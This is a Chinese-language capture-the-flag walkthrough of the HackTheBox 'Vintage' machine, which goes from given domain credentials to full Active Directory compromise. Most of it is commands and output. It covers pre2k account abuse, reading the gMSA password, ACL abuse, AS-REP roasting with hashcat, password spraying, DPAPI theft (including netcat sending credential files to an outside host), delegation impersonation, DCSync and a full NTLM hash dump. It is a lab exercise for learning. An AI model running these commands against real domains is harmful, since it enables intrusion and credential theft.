Vintage - HackTheBox

基本信息

• https://app.hackthebox.com/machines/Vintage
• 10.10.11.45

As is common in real life Windows pentests, you will start the Vintage box with credentials for the following account: P.Rosa / Rosaisbest123

端口扫描

没有web端口，常规域端口：

$ nmap -sC -sV -Pn 10.10.11.45
Starting Nmap 7.95 ( https://nmap.org ) at 2024-12-02 13:45 CST
Nmap scan report for 10.10.11.45
Host is up (0.074s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-12-02 05:32:39Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: vintage.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: vintage.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2024-12-02T05:32:46
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
|_clock-skew: -13m49s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 107.39 seconds

bloodhound

因为给了初始账号密码，直接添加hosts后先跑bloodhound：

10.10.11.45 vintage.htb dc01.vintage.htb

faketime -f "-13m" bloodhound-python -u P.Rosa -p Rosaisbest123 -d vintage.htb -c All --zip  --dns-tcp -ns 10.10.11.45

bloodhound暂时没什么直接路径

users.txt

可以从bloodhound整理，也可以这样：

faketime -f "-13m" nxc smb dc01.vintage.htb -u P.Rosa -p Rosaisbest123 -d vintage.htb -k --rid-brute 5000 | grep SidTypeUser | cut -d ':' -f2 | cut -d '\' -f2 | cut -d ' ' -f1 > users.txt

Administrator
Guest
krbtgt
DC01$
gMSA01$
FS01$
M.Rossi
R.Verdi
L.Bianchi
G.Viola
C.Neri
P.Rosa
svc_sql
svc_ldap
svc_ark
C.Neri_adm
L.Bianchi_adm

pre2k

这里是在添加主机时勾选了将此计算机帐户指定为Windows 2000 之前的计算机，导致自动使用主机名作为密码：

• TrustedSec | Diving into Pre-Created Computer Accounts
  https://www.trustedsec.com/blog/diving-into-pre-created-computer-accounts
• garrettfoster13/pre2k
  https://github.com/garrettfoster13/pre2k

利用这种方式发现FS01，得到一个ccache：

faketime -f "-13m" pre2k unauth -d vintage.htb -dc-ip 10.10.11.45 -save -inputfile ../users.txt -verbose

[14:24:44] INFO     VALID CREDENTIALS: vintage.htb\FS01$:fs01

FS01 to GMSA

之后就使用前面得到的fs01票据进行操作：

export KRB5CCNAME=FS01\$.ccache

根据bloodhound，fs01是domain computers，可以读gmsa：

读gmsa得到gmsa01$:

• ReadGMSAPassword | The Hacker Recipes
  https://www.thehacker.recipes/ad/movement/dacl/readgmsapassword

faketime -f "-13m" bloodyAD --host dc01.vintage.htb -d VINTAGE.HTB --dc-ip 10.10.11.45 -k get object 'GMSA01$' --attr msDS-ManagedPassword

54311f0ed05b807a7aaf5943b595f224

GMSA01

之后就为gmsa01申请票据，进行后续操作：

faketime -f "-13m" python3 examples/getTGT.py vintage.htb/'GMSA01$' -hashes :54311f0ed05b807a7aaf5943b595f224

export KRB5CCNAME=GMSA01\$.ccache

gmsa01对SERVICEMANAGERS有GenericWrite：

我们可以对这个组做操作，例如添加用户

然后SERVICEMANAGERS对几个svc账户有GenericAll，我们可以对其修改属性之类，而用户中我们可以看到一个禁用的SVC_SQL，所以我们可以把禁用的用户进行启用：

SERVICEMANAGERS

首先添加用户到SERVICEMANAGERS组中：

• AddMember | The Hacker Recipes
  https://www.thehacker.recipes/ad/movement/dacl/addmember

faketime -f "-13m" bloodyAD --host dc01.vintage.htb -d VINTAGE.HTB --dc-ip 10.10.11.45 -k add groupMember "SERVICEMANAGERS" "P.Rosa"

SVC_XXX

然后使用我们添加的P.Rosa对几个svc账号进行操作

• User Guide · CravateRouge/bloodyAD Wiki
  https://github.com/CravateRouge/bloodyAD/wiki/User-Guide#add-uac

faketime -f "-13m" python3 examples/getTGT.py vintage.htb/P.Rosa:Rosaisbest123
export KRB5CCNAME=P.Rosa.ccache

# 设置几个账号不需要preauth，后续进行asrep roast
faketime -f "-13m" bloodyAD --host dc01.vintage.htb -d VINTAGE.HTB --dc-ip 10.10.11.45 -k add uac SVC_ARK -f DONT_REQ_PREAUTH
faketime -f "-13m" bloodyAD --host dc01.vintage.htb -d VINTAGE.HTB --dc-ip 10.10.11.45 -k add uac SVC_LDAP -f DONT_REQ_PREAUTH
faketime -f "-13m" bloodyAD --host dc01.vintage.htb -d VINTAGE.HTB --dc-ip 10.10.11.45 -k add uac SVC_SQL -f DONT_REQ_PREAUTH

# 启用SVC_SQL
faketime -f "-13m" bloodyAD --host dc01.vintage.htb -d VINTAGE.HTB --dc-ip 10.10.11.45 -k remove uac SVC_SQL -f ACCOUNTDISABLE

asrep roast

已经对几个账号添加了不需要preauth，接下来就是asrep rosating：

faketime -f "-13m" python3 examples/GetNPUsers.py -request -format hashcat -usersfile users.txt vintage.htb/

得到的hash进行破解,得到svc_sql密码：

sudo hashcat -m 18200 hash.txt ~/Tools/dict/rockyou.txt

Zer0the0ne

C.Neri & user flag

使用破解出的密码进行喷洒，发现C.Neri使用相同密码：

faketime -f "-13m" ./kerbrute_darwin_amd64 --dc vintage.htb -d vintage.htb -v passwordspray users.txt Zer0the0ne

2024/12/02 15:04:56 >  [+] VALID LOGIN:	 svc_sql@vintage.htb:Zer0the0ne
2024/12/02 15:04:56 >  [+] VALID LOGIN:	 C.Neri@vintage.htb:Zer0the0ne

之后使用得到的账号密码登录即可，因为只支持kerberos认证，需要修改一下配置文件：

# 这部分换kali操作了，mac有点问题
sudo ntpdate -s 10.10.11.45

impacket-getTGT vintage.htb/C.Neri:Zer0the0ne
export KRB5CCNAME=C.Neri.ccache

sudo nano /etc/krb5.conf
evil-winrm -i dc01.vintage.htb -r vintage.htb

krb5.conf

[libdefault]
    default_realm = VINTAGE.HTB
    
[realms]
    VINTAGE.HTB = {
        kdc = dc01.vintage.htb
        admin_server = dc01.vintage.htb
    }

[domain_realm]
    vintage.htb = VINTAGE.HTB
    .vintage.htb = VINTAGE.HTB

C.Neri_ADM

然后查看用户可以发现C.Neri还有个adm用户

DPAPI

这里就是模拟现实场景，同一个人日常使用普通账户，需要高权限操作时切换到管理员账户，但为了方便操作保存了凭据，常规dpapi

但机器有杀软，把相关文件下载到本地操作即可：

*Evil-WinRM* PS C:\Users\C.Neri\appdata\Roaming\Microsoft\Protect\S-1-5-21-4024337825-2033394866-2055507597-1115> Get-ChildItem -Force

cmd /c ".\nc64.exe 10.10.14.18 4444 <  C:\Users\C.Neri\AppData\Roaming\Microsoft\Protect\S-1-5-21-4024337825-2033394866-2055507597-1115\99cf41a3-a552-4cf7-a8d7-aca2d6f7339b"

cmd /c ".\nc64.exe 10.10.14.18 4444 < C:\Users\C.Neri\appdata\roaming\microsoft\credentials\C4BB96844A5C9DD45D5B6A9859252BA6"

之后就是本地解dpapi：

• DPAPI secrets | The Hacker Recipes
  https://www.thehacker.recipes/ad/movement/credentials/dumping/dpapi-protected-secrets#practice

python3 ~/Tools/impacket/impacket_main/examples/dpapi.py masterkey -file 99cf41a3-a552-4cf7-a8d7-aca2d6f7339b -sid S-1-5-21-4024337825-2033394866-2055507597-1115 -password Zer0the0ne

python3 ~/Tools/impacket/impacket_main/examples/dpapi.py credential -file C4BB96844A5C9DD45D5B6A9859252BA6 -key 0xf8901b2125dd10209da9f66562df2e68e89a48cd0278b48a37f510df01418e68b283c61707f3935662443d81c0d352f1bc8055523bf65b2d763191ecd44e525a

Username    : vintage\c.neri_adm
Unknown     : Uncr4ck4bl3P4ssW0rd0312

DELEGATEDADMINS

之后使用c.neri_adm进行操作：

faketime -f "-13m" python3 examples/getTGT.py vintage.htb/c.neri_adm:Uncr4ck4bl3P4ssW0rd0312
export KRB5CCNAME=c.neri_adm.ccache

可以看到对DELEGATEDADMINS组有GenericWrite权限,我们可以向其中添加用户：

那我们如果添加一个设置了spn的svc用户，就可以委派模拟其他用户，另外可以看到L.BIANCHI_ADM有dcsync权限，可以作为我们的目标用户：

add svc to DELEGATEDADMINS

# 使用前面的servicemanagers票据
export KRB5CCNAME=P.Rosa.ccache
faketime -f "-13m" bloodyAD --host dc01.vintage.htb -d VINTAGE.HTB --dc-ip 10.10.11.45 -k set object 'SVC_SQL' servicePrincipalName -v "cifs/x"

# 使用c.neri_adm
export KRB5CCNAME=c.neri_adm.ccache
faketime -f "-13m" bloodyAD --host dc01.vintage.htb -d VINTAGE.HTB --dc-ip 10.10.11.45 -k add groupMember "DELEGATEDADMINS" "SVC_SQL"

impersonate & dcsync

然后就使用svc_sql模拟L.BIANCHI_ADM：

# sql_svc如果已经被自动禁用了，重新启用一下
# 一系列操作快速完成
faketime -f "-13m" python3 examples/getTGT.py vintage.htb/svc_sql:Zer0the0ne
export KRB5CCNAME=svc_sql.ccache

faketime -f "-13m" python3 examples/getST.py -spn 'cifs/dc01.vintage.htb' -impersonate L.BIANCHI_ADM -dc-ip 10.10.11.45 -k 'vintage.htb/svc_sql:Zer0the0ne'
export KRB5CCNAME=L.BIANCHI_ADM@cifs_dc01.vintage.htb@VINTAGE.HTB.ccache

# dcsync
faketime -f "-13m" python3 examples/secretsdump.py L.BIANCHI_ADM@dc01.vintage.htb -just-dc-ntlm -just-dc-user Administrator -k -no-pass

468c7497513f8243b59980f2240a10de

root flag

Administrator实际上不能登录，还是使用L.BIANCHI_ADM：

export KRB5CCNAME=L.BIANCHI_ADM@cifs_dc01.vintage.htb@VINTAGE.HTB.ccache
faketime -f "-13m" python3 examples/wmiexec.py L.BIANCHI_ADM@dc01.vintage.htb -k -no-pass

hashdump

faketime -f "-13m" python3 examples/secretsdump.py L.BIANCHI_ADM@dc01.vintage.htb -just-dc-ntlm -k -no-pass

Administrator:500:aad3b435b51404eeaad3b435b51404ee:468c7497513f8243b59980f2240a10de:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:be3d376d906753c7373b15ac460724d8:::
M.Rossi:1111:aad3b435b51404eeaad3b435b51404ee:8e5fc7685b7ae019a516c2515bbd310d:::
R.Verdi:1112:aad3b435b51404eeaad3b435b51404ee:42232fb11274c292ed84dcbcc200db57:::
L.Bianchi:1113:aad3b435b51404eeaad3b435b51404ee:de9f0e05b3eaa440b2842b8fe3449545:::
G.Viola:1114:aad3b435b51404eeaad3b435b51404ee:1d1c5d252941e889d2f3afdd7e0b53bf:::
C.Neri:1115:aad3b435b51404eeaad3b435b51404ee:cc5156663cd522d5fa1931f6684af639:::
P.Rosa:1116:aad3b435b51404eeaad3b435b51404ee:8c241d5fe65f801b408c96776b38fba2:::
svc_sql:1134:aad3b435b51404eeaad3b435b51404ee:cc5156663cd522d5fa1931f6684af639:::
svc_ldap:1135:aad3b435b51404eeaad3b435b51404ee:458fd9b330df2eff17c42198627169aa:::
svc_ark:1136:aad3b435b51404eeaad3b435b51404ee:1d1c5d252941e889d2f3afdd7e0b53bf:::
C.Neri_adm:1140:aad3b435b51404eeaad3b435b51404ee:91c4418311c6e34bd2e9a3bda5e96594:::
L.Bianchi_adm:1141:aad3b435b51404eeaad3b435b51404ee:b0e2eccf559f2be2120e9bce41a51e2c:::
DC01$:1002:aad3b435b51404eeaad3b435b51404ee:2dc5282ca43835331648e7e0bd41f2d5:::
gMSA01$:1107:aad3b435b51404eeaad3b435b51404ee:54311f0ed05b807a7aaf5943b595f224:::
FS01$:1108:aad3b435b51404eeaad3b435b51404ee:44a59c02ec44a90366ad1d0f8a781274:::

参考资料

• TrustedSec | Diving into Pre-Created Computer Accounts
  https://www.trustedsec.com/blog/diving-into-pre-created-computer-accounts
• garrettfoster13/pre2k
  https://github.com/garrettfoster13/pre2k
• ReadGMSAPassword | The Hacker Recipes
  https://www.thehacker.recipes/ad/movement/dacl/readgmsapassword
• AddMember | The Hacker Recipes
  https://www.thehacker.recipes/ad/movement/dacl/addmember
• User Guide · CravateRouge/bloodyAD Wiki
  https://github.com/CravateRouge/bloodyAD/wiki/User-Guide#add-uac
• DPAPI secrets | The Hacker Recipes
  https://www.thehacker.recipes/ad/movement/credentials/dumping/dpapi-protected-secrets#practice